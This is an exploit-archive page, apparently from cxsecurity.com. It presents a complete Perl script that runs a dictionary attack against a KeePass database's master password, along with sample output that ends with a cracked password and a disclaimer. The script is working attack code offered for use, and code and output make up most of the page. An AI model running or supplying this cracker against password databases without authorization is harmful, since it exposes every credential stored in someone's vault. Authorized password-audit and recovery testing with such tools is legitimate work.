KeePass Simple Dictionary Password Enumerator

2018.04.05
Credit: Todor Donev
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl # # KeePass simple dictionary password enumerator # # Copyright 2018 (c) Todor Donev <todor.donev at gmail.com> # https://ethical-hacker.org/ # https://facebook.com/ethicalhackerorg # # KeePass is a free open source password manager, # which helps you to manage your passwords in a # secure way. You can put all your passwords in one # database, which is locked with one master key or # a key file. So you only have to remember one single # master password or select the key file to unlock # the whole database. The databases are encrypted # using the best and most secure encryption algorithms # currently known (AES and Twofish). # # Description: # Dictionary Attacks are a method of using a program # to try a list of words on the interface or program # that is protecting the area that you want to gain # access to. The most simple password crackers using # dictionary attacks use a list of common single words, # aka a "dictionary". More advanced programs often use # a dictionary on top of mixing in numbers or common # symbols at the beginning or end of the guessed words. # Some can even be given a set of personal information # or a profile of the user and pick out important words # to guess, even if they are not proper words, such as # pronouns like last names and names of relatives. # A weakness of dictionary attacks is that it obviously # relies on words supplied by a user, typically real words, # to function. If the password is misspelled, is in another # language, or very simply uses a word that is not in the # dictionary or profile, it cannot succeed. Most of the # time, even using two words in one password can thwart # a dictionary attack. # # # [todor@paladium ~]$ perl keepass.pl NewDatabase.kdbx wordlist.txt # [+] KeePass simple dictionary password enumerator # [*] ====== # [?] Trying admin # [?] Trying 123456dqwdqwd # [?] Trying dhasdasdasdadasdassfsadfdsf # [?] Trying adsfdasdasdasdasd # [?] Trying sdafqwdqwdqw # [?] Trying sdadqwdqwdqdqw # [?] Trying fi3oj12gyu3123oiu1298ud89asuda9sduas98duas # [?] Trying sadfd87asdyhoijwqd98asud8asd # [?] Trying sadka98sud89asud98asdhjasidasodll # [?] Trying gfdkasjiohduiasdhaod # [?] Trying wdpasi9ud8uas7dhuasid # [?] Trying 3qgpdokasijdhuaygdqhwoidjpasjd # [?] Trying ewgdasdasdczxczxc # [?] Trying weczcxcasascsdvsdgdsfhsgfhdfd # [?] Trying gwehdfhfghergrwegagdsgdfgdfsgdfgsd # [?] Trying ggdsgdsfgdsfgdsfgsdf # [?] Trying gdfsgsddwqdqwdqwd # [*] ====== # [!] Author: Todor Donev <todor.donev at gmail.com> # [!] https://ethical-hacker.org/ # [!] https://fb.com/ethicalhackerorg # [*] ====== # [*] Password for NewDatabase.kdbx is Ethical-Hacker-Bulgaria-2o18 # # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # Requirements: # cpan install XML::Parser # cpan install Crypt::Rijndael # cpan install File::KeePass # use warnings; use strict; use File::KeePass; use open ':std', ':encoding(UTF-8)'; my $k = File::KeePass->new; my ($p, $w) = @ARGV; print "[+] KeePass simple dictionary password enumerator\n"; &banner and die "[!] Usage: perl $0 <Keepass DBv1 or DBv2> <Wordlist>" if @ARGV != 2; open (KEEPASSDB, " <$p") or die "[-] Error: $p $!"; die "[-]Error: The database is empty." if (-z $p); close (KEEPASSDB); open (WORDLIST, " <$w") or die "[-] Error: $w $!"; die "[-] Error: Wordlist is empty" if (-z $w); my @file = <WORDLIST>; print "[*] ======\n"; foreach my $c(@file) { chomp $c; if (! eval { $k->load_db($p, $c) }) { print "[?] Trying $c\n"; } else{ &banner and die "[*] Password for $p is $c\n"; } } close (WORDLIST); &banner and die "[-] Sorry, $@"; sub banner{ print "[*] ======\n"; print "[!] Author: Todor Donev <todor.donev at gmail.com>\n"; print "[!] https://ethical-hacker.org/\n"; print "[!] https://fb.com/ethicalhackerorg\n"; print "[*] ======\n"; }


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top